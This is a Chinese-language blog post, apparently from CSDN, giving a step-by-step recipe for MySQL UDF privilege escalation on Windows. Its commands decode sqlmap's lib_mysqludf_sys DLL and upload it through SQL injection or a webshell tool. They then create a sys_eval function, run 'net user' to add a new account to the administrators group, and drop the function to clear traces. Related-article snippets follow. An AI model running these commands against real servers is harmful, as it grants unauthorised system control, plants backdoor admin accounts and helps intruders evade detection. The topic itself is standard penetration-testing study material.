MySQL UDF提权

最新推荐文章于 2024-06-08 15:51:52 发布
最新推荐文章于 2024-06-08 15:51:52 发布
阅读量706 收藏 2
点赞数 1
分类专栏: 安全 文章标签: 渗透测试 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Myu_wzy/article/details/121526141
版权

目录

一、UDF 介绍

二、UDF提权步骤

1. 查看存放 udf.dll 的指定目录

2. 在 kali 获取 udf.dll 文件

3. 把 udf.dll 文件上传到指定目录

4. 创建用户自定义函数 sys_eval

5. 执行自定义函数 sys_eval

6. 清除痕迹

三、拓展资料

一、UDF 介绍

UDF 是 Mysql 的一个拓展接口,UDF(Userdefined function) 可翻译为用户自定义函数,是用来拓展 Mysql 的技术手段。

二、UDF提权步骤

1. 查看存放 udf.dll 的指定目录

        使用 sql 语句查看 plugin 目录

select @@plugin_dir;

show variables like 'plugin%';

该目录默认是不存在的,需要我们在 Mysql 的安装路径下创建 lib\plugin 文件夹

2. 在 kali 获取 udf.dll 文件

        使用 kali 系统中 sqlmap 自带的 cloak.py 文件,对 lib_mysqludf_sys.dll_ 文件解码。

cd /usr/share/sqlmap/extra/cloak  # 进入cloak目录
./cloak.py -d -i /usr/share/sqlmap/data/udf/mysql/windows/32/lib_mysqludf_sys.dll_ 
# 解码 lib_mysqludf_sys.dll_ 文件

        此时在 /usr/share/sqlmap/data/udf/mysql/windows/32 目录下,会生成一个 lib_mysqludf_sys.dll 文件,把该文件存在 web 中,方便提取使用。

将文件改名为 udf.dll

3. 把 udf.dll 文件上传到指定目录

        可以通过下列方法将 udf.dll 文件上传到 lib\plugin 目录

利用 sql注入 进行上传 select load_file() into dumpfile “具体路径”。

直接利用 菜刀/蚁剑 拖拽到具体目录下。

4. 创建用户自定义函数 sys_eval

create function sys_eval returns string soname 'udf.dll';
#sys_eval是函数名称,udf.dll是lib_mysqludf_sys.dll_上传后的文件名
select * from mysql.func where name = 'sys_eval';
#查看函数是否存在,验证创建

5. 执行自定义函数 sys_eval

        通过自定义函数创建用户,并将用户提升为 administrators 组的用户

select sys_eval("net user username password /add");
# 创建新用户,用户名为 username 密码为 password
select sys_eval("net localGroup administrators username /add")
# 将新用户 username 加入管理员组

6. 清除痕迹

        删除自定义函数,清除痕迹

drop function sys_eval;

三、拓展资料

sqlmap中的udf文件提供的函数:

sys_eval,执行任意命令,并将输出返回。

sys_exec,执行任意命令,并将退出码返回。

sys_get,获取一个环境变量。

sys_set,创建或修改一个环境变量。

 参考文章

MySQL UDF提权_小水池-CSDN博客_udf提权

Myu_ww
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
MySQL UDF 提权
small_cat's home
10-22 1842
UDF 全称 User Defind Function(用户自定义函数),用户通过自定义函数可以实现在 MySQL 中无法方便实现的功能,其添加的新函数都可以在 SQL 语句中调用,就像调用本机函数 version () 一样方便。UDF 提权是通过这样的方法来实现获取对方主机的system的shell权限,从而达到提权的目的。要实现 UDF 提权需要有一个动态链接库文件
lib_mysqludf_sys 的win版本dll
12-01
lib_mysqludf_sys 的win版本dll
MysqlUDF提权
热门推荐
good good study
11-07 1万+
udf提权通过在mysql中添加自定义函数来执行系统命令。效果是从 mysql权限 —> 系统权限。提权限制条件挺多,如下先获取mysql的权限(连接上了mysql数据库)Mysql版本大于5.1,我们需手动创建plugin文件夹,这是个棘手的问题mysql有写入文件的权限,即secure_file_priv的值为空。
MySQL提权UDF提权
最新发布
2301_76227305的博客
06-08 959
udf 全称为'user defined function',意思是'用户自定义函数'。用户可以对数据库所使用的函数进行一个扩展(windows利用dll文件,linux利用so文件),那么我们就可以利用这个特点,往MySQL里面添加一个可以执行系统命令的函数即可。udf提权本质就是通过添加自定义函数让MySQL能执行系统命令,仅此而已。最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
mysql用户自定义函数(UDFdll插件编写
shadow20112011的博客
12-24 1596
函数和储存过程 数据库中,函数分为两类,普通函数,无需外部插件支持;用户自定义函数(user defined function,简称UDF),需要外部插件支持,例如dll文件(windows系统)或者so文件(linux系统)。 函数的调用 普通函数,使用储存过程调用;用户自定义函数,可以直接调用(前提是已有支持插件)。 普通函数实例代码 delimiter $$ create function ...
MySQL 利用UDF执行命令
1ame的博客
09-02 1万+
UDF即User-Defined Functions lib_mysqludf_sys 在github的介绍: A UDF library with functions to interact with the operating system. These functions allow you to interact with the execution environment
UDF提权mysql
墨鱼菜鸡
09-10 183
目录 环境 1.什么是UDF:用户自定义函数 2.前提 3.查看mysql位数 4.打开sqlmap文件夹 5.dl_文件为了防止误杀,dll_文件会经过异或编码,不能直接用,如果想用的话需要对其进行解码 6.解码 7.上传dll文件至指定文件夹(mysql安装目录下的lib/plugin/) 8.在mysql命令行导入函数 9.执行...
mysql udf提权文件
02-01
mysql udf提权文件mysql udf提权文件
mysql提权udf
09-20
5. **安全防御**:对于防御者来说,防止MySQL UDF提权的关键在于强化数据库的安全策略。这包括限制不必要的用户权限,禁用对系统表的写入,使用安全的编码和参数化查询以防止SQL注入,以及定期更新和扫描系统以检测...
udf提权_udf提权_udf.dll下载提权_mysql提权_ballsv6_提权_源码
10-04
mysql提权udf提权所需要的dll文件,有64位和32位
Linux利用UDF库实现Mysql提权
09-10
本篇将详细介绍如何利用UDF库来实现MySQL提权操作。 首先,提权通常涉及到获取更高的系统权限,而在MySQL中,通过UDF库可以执行系统级别的命令,从而可能达到提升权限的目的。要实现这一过程,我们需要满足以下...
MYSQL高版本低版本UDF提权工具
06-20
描述中的“有两个版本”可能指的是为不同MySQL版本设计的两种UDF提权工具。 在进行UDF提权时,安全专家通常会遵循以下步骤: 1. 分析目标MySQL版本的特性和已知漏洞。 2. 设计或寻找适合的UDF库,该库能够执行提权...
mysql提权总结
weixin_45605374的博客
12-12 735
udf提权 UDF(user defined function)用户定义函数,是mysql的一次拓展连接⼝。用户可以通过自定义函数实现在mysql中⽆法例实现的功能,其新函数都可以在sql语句中添加中调使⽤,像调⽤本机函数⼀样。 前提条件 已经获取到数据库的账号、密码,可以远程连接到 mysql有写入文件的权限,即secure_file_priv的值为空。 show global variables like 'secure%'; mysql版本区别 1、MySQL<5.0,导出路径随意;
Mysql提权方法总结系列-UDF提权
kracer的博客
02-27 2590
0x01 简介 UDF(user-defined function)是MySQL的一个拓展接口,也可称之为用户自定义函数,它是用来拓展MySQL的技术手段,可以说是数据库功能的一种扩展,用户通过自定义函数来实现MySQL中无法方便实现的功能,其添加的新函数都可以在SQL语句中调用,就像本机函数如ABS()或SOUNDEX()一样方便。UDF官方介绍以及其函数定义请参考链接。 0x01 当获取到mysql的root权限,需要进行权限提升,可以尝试使用udf提权。 1、条件判断 ① ...
MySQL总结一 UDF提权
xiaopan233的博客
03-25 1953
UDF提权 kali 中文件位置 /usr/share/metasploit-framework/data/exploits/mysql 首先先要破解得到靶机的数据库密码。使用kali连接后。查看一些必要的属性 查看插件路径 show variables like "%plugin%"; 看到了插件目录了。我们来看看我们能通过什么方式将UDF插件放到这个目录...
内网渗透之——mysql数据库提权之——UDF提权
wsnbbz的博客
03-11 1965
介绍 UDFmysql的一个拓展接口,UDF(Userdefined function)可翻译为用户自定义函数,这个是用来拓展Mysql的技术手段。 原理 UDF可以理解为MySQL的函数库,可以利用UDF定义创建函数(其中包括了执行系统命令的函数),要想利用udf,必须上传udf.dll作为udf的执行库,mysql中支持UDF扩展 ,使得我们可以调用DLL里面的函数来实现一些特殊的功能...
mysql udf提权
weixin_44580111的博客
06-24 958
一次mysql提权的历程
权限提升-mysql提权总结
告白的博客
09-06 1065
0x00 mysql数据库提权方式简介 1)udf提权 2)mof提权 3)启动项提权-反弹shell-exp提权 提权思路:1.探针数据库的存在-端口服务,2.必须获取到数据库的权限密码,3.数据库的类型分类 重点:数据库的账号密码获取方式, 1.网站配置文件sql data inc config conn database commin include等 2.读取数据库备份文件下的库中表等信息,数据库名/表名.MYD文件储存密码,例如mysql数据库在mysql_user表中储存账户密码,使用
mysql udf 提权
03-06
需要注意的是,UDF提权需要满足以下条件: 1. 你需要有CREATE FUNCTION权限,以创建和加载UDF函数。 2. 你需要找到一个合适的提权方法,并编写相应的UDF函数。 3. 你需要知道目标MySQL服务器的版本和配置,以确保你...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值